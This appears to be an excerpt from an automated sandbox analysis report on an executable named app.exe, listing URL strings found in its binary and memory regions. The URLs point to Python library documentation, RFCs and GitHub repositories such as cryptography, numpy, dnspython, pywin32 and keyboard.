    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://packages.python.org/altgraph
    Source: app.exe, 00000000.00000003.2068294593.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291567385.00007FF8B8CB7000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: http://pracrand.sourceforge.net/RNG_engines.txt
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://pypi.python.org/pypi/altgraph
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: http://pypi.python.org/pypi/sphinx
    Source: python38.dll.0.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
    Source: app.exeString found in binary or memory: http://schemas.mic
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://timelessrepo.com/json-isnt-a-javascript-subset).
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
    Source: app.exe, 00000002.00000002.3284661842.000002083AD20000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3284539258.000002083ABE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
    Source: app.exe, 00000002.00000002.3283019914.0000020839F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
    Source: app.exe, 00000002.00000002.3278244921.00000208330C0000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2047691424.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2048636747.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ams.org/journals/mcom/1988-51-184/
    Source: app.exe, 00000000.00000003.2075494864.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
    Source: app.exe, 00000000.00000003.2075564337.0000022254576000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2075494864.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2075494864.0000022254576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: app.exe, 00000002.00000002.3278313870.0000020833140000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
    Source: app.exe, 00000002.00000002.3284480705.000002083AB60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.doi.org/10.1109/IEEESTD.2008.4610935
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/index.html
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020832F47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
    Source: app.exe, 00000002.00000002.3288262051.00007FF8A8E33000.00000002.00000001.01000000.00000019.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3288121573.00007FF8A8DC8000.00000008.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288079451.00007FF8A8D97000.00000002.00000001.01000000.00000021.sdmp, app.exe, 00000002.00000002.3288304365.00007FF8A8E61000.00000008.00000001.01000000.00000019.sdmpString found in binary or memory: http://www.inference.org.uk/mackay/itila/
    Source: app.exe, 00000000.00000003.2068007141.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3289687679.00007FF8B5600000.00000004.00000001.01000000.0000001D.sdmpString found in binary or memory: http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/JUMP/
    Source: app.exe, 00000000.00000003.2043659043.0000022254575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
    Source: app.exe, 00000000.00000003.2068105336.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3289485767.00007FF8B27CC000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.pcg-random.org/
    Source: app.exe, 00000000.00000003.2068383589.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3290322040.00007FF8B7816000.00000002.00000001.01000000.0000001A.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.html
    Source: app.exe, 00000000.00000003.2068294593.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291567385.00007FF8B8CB7000.00000002.00000001.01000000.00000020.sdmpString found in binary or memory: http://www.pcg-random.org/posts/random-invertible-mapping-statistics.html
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/
    Source: app.exe, 00000002.00000002.3277949660.0000020832DC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
    Source: app.exe, 00000002.00000002.3277659700.0000020832B40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
    Source: app.exe, 00000002.00000002.3278071149.0000020832F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.scipy.org/not/real/data.txt
    Source: app.exe, 00000002.00000002.3283351198.000002083A0C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xyz.edu/data
    Source: app.exe, 00000002.00000002.3279130529.0000020833952000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://altgraph.readthedocs.io
    Source: METADATA.0.drString found in binary or memory: https://altgraph.readthedocs.io/en/latest/
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badge.fury.io/py/dnspython)
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badge.fury.io/py/dnspython.svg)
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
    Source: app.exe, app.exe, 00000002.00000002.3285487043.00007FF8A7EBC000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/github/pyca/cryptography/coverage.svg?branch=main
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/github/pyca/cryptography?branch=main
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation.html
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security.html
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://data-apis.org/array-api/latest/design_topics/data_interchange.html#syntax-for-data-interchan
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dmlc.github.io/dlpack/latest/python_spec.html
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnspython.readthedocs.io).
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnspython.readthedocs.io/en/latest/?badge=latest)
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnspython.readthedocs.io/en/stable/
    Source: app.exe, 00000000.00000003.2075202474.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnspython.readthedocs.io/en/stable/whatsnew.html)
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
    Source: app.exe, 00000002.00000002.3282781695.0000020839DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
    Source: app.exe, 00000002.00000002.3283019914.0000020839F10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/stdtypes.html#int-max-str-digits
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/library/string.html#format-specification-mini-language
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.scipy.org/doc/numpy/user/basics.io.genfromtxt.html
    Source: app.exe, 00000002.00000002.3282324955.0000020839AB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.scipy.org/doc/numpy/user/numpy-for-matlab-users.html).
    Source: app.exe, 00000002.00000002.3278071149.0000020833029000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2092269988.0000020833029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539#
    Source: app.exe, 00000000.00000003.2068383589.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3290322040.00007FF8B7816000.00000002.00000001.01000000.0000001A.sdmp, app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/imneme/540829265469e673d045
    Source: app.exe, 00000002.00000002.3278572779.00000208332F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
    Source: app.exe, 00000002.00000002.3283351198.000002083A002000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
    Source: app.exe, 00000002.00000003.2080546887.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080546887.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830ABE000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830B62000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/arogozhnikov/einops
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard#api)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard/archive/master.zip)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard/issues/20)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard/issues/21)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/keyboard/issues/22)
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/boppreh/mouse)
    Source: app.exe, 00000002.00000002.3278412088.00000208331F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joblib/threadpoolctl
    Source: app.exe, 00000000.00000003.2070438839.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041226515.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000000.00000003.2041226515.0000022254577000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3290764335.00007FF8B7E05000.00000002.00000001.01000000.00000013.sdmp, win32api.pyd.0.dr, win32pdh.pyd.0.drString found in binary or memory: https://github.com/mhammond/pywin32
    Source: app.exe, 00000002.00000002.3279032842.0000020833520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nu
    Source: app.exe, 00000002.00000002.3282483977.0000020839B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/numpy/numpy/issues/4763
    Source: app.exe, 00000002.00000002.3278442607.0000020833230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
    Source: app.exe, 00000000.00000003.2074815270.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
    Source: app.exe, 00000002.00000002.3279130529.0000020833611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pydata/bottleneck
    Source: app.exe, 00000002.00000002.3278811218.0000020833420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
    Source: app.exe, 00000002.00000002.3278811218.0000020833420000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packagingapih__
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-jsonschema/jsonschema
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-jsonschema/jsonschema/actions?query=workflow%3ACI
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-jsonschema/jsonschema/blob/main/CHANGELOG.rst
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-jsonschema/jsonschema/issues/
    Source: app.exe, 00000000.00000003.2076072953.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-jsonschema/jsonschema/workflows/CI/badge.svg
    Source: app.exe, 00000002.00000002.3279130529.00000208335A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.7/Objects/listsort.txt
    Source: app.exe, 00000002.00000003.2083861282.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080546887.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277409111.0000020832450000.00000004.00001000.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
    Source: app.exe, 00000002.00000003.2080992141.0000020830B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
    Source: app.exe, 00000002.00000003.2080546887.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2083861282.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080546887.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B2E000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085120862.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830ABE000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2082241972.0000020830B3C000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3277037650.0000020830B62000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2085786399.0000020830B6B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2080992141.0000020830B6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
    Source: app.exe, 00000000.00000003.2075582136.0000022254569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/ronaldoussoren/altgraph
    Source: app.exe, 00000000.00000003.2072724611.0000022254569000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/ronaldoussoren/altgraph/
    Source: METADATA.0.drString found in binary or memory: https://github.com/ronaldoussoren/altgraph/issues
